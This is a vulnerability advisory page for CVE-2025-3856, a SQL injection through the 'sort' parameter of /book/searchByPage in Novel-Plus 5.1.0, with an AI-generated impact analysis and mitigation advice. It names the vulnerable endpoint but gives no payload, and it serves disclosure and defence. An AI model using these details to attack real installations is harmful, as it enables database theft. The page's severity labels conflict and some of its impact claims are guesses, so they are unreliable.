Skip to main content

CVE-2025-3856: SQL Injection in xxyopen Novel-Plus

Medium
VulnerabilityCVE-2025-3856cvecve-2025-3856sql-injectioninjection
Published: Tue Apr 22 2025 (04/22/2025, 01:00:11 UTC)
Source: CVE
Vendor/Project: xxyopen
Product: Novel-Plus

Description

A vulnerability was found in xxyopen Novel-Plus 5.1.0. It has been classified as critical. This affects the function searchByPage of the file /book/searchByPage. The manipulation of the argument sort leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AI-Powered Analysis

AILast updated: 06/21/2025, 15:53:35 UTC

Technical Analysis

CVE-2025-3856 is a critical SQL injection vulnerability identified in version 5.1.0 of the xxyopen Novel-Plus software, specifically within the searchByPage function located in the /book/searchByPage endpoint. The vulnerability arises due to improper sanitization or validation of the 'sort' parameter, which is directly incorporated into SQL queries without adequate escaping or parameterization. This flaw allows an attacker to inject arbitrary SQL code remotely by manipulating the 'sort' argument, potentially enabling unauthorized access to the backend database. Exploitation could lead to unauthorized data disclosure, data modification, or even full compromise of the database server. The vulnerability is remotely exploitable without requiring authentication or user interaction, increasing the risk profile. Although the vendor was notified early, no response or patch has been issued, and while no known exploits have been observed in the wild yet, the public disclosure of the exploit code increases the likelihood of imminent attacks. The lack of vendor response and patch availability further exacerbates the risk for organizations using this specific version of Novel-Plus.

Potential Impact

For European organizations using xxyopen Novel-Plus 5.1.0, this vulnerability poses a significant risk to the confidentiality, integrity, and availability of their data. Given that Novel-Plus is likely used for managing or distributing digital content (e.g., novels or publications), exploitation could lead to unauthorized access to sensitive user data, intellectual property theft, or manipulation of content databases. This could damage organizational reputation, lead to regulatory non-compliance (especially under GDPR), and cause operational disruptions. The ability to execute arbitrary SQL commands remotely without authentication means attackers can potentially extract large volumes of data or corrupt databases, impacting service availability. Organizations in sectors such as publishing, education, or digital media in Europe could face targeted attacks, especially if they rely on this software for critical business functions.

Mitigation Recommendations

Given the absence of an official patch, European organizations should immediately implement compensating controls. First, apply strict input validation and sanitization on the 'sort' parameter at the web application firewall (WAF) or reverse proxy level, blocking suspicious SQL keywords or patterns. Employ parameterized queries or prepared statements if possible by modifying the application code. Restrict database user permissions to the minimum necessary, preventing the application account from performing destructive operations. Monitor logs for unusual query patterns or repeated access to /book/searchByPage with anomalous 'sort' values. Network segmentation should isolate the application and database servers to limit lateral movement. If feasible, temporarily disable or restrict access to the vulnerable endpoint until a patch or vendor response is available. Additionally, conduct regular backups of the database to enable recovery in case of compromise. Organizations should also engage with the vendor or community for updates and consider alternative software if the vendor remains unresponsive.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
VulDB
Date Reserved
2025-04-21T14:20:20.282Z
Cisa Enriched
true

Threat ID: 682d984ac4522896dcbf78ed

Added to database: 5/21/2025, 9:09:30 AM

Last enriched: 6/21/2025, 3:53:35 PM

Last updated: 8/11/2025, 6:57:57 PM

Views: 12

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats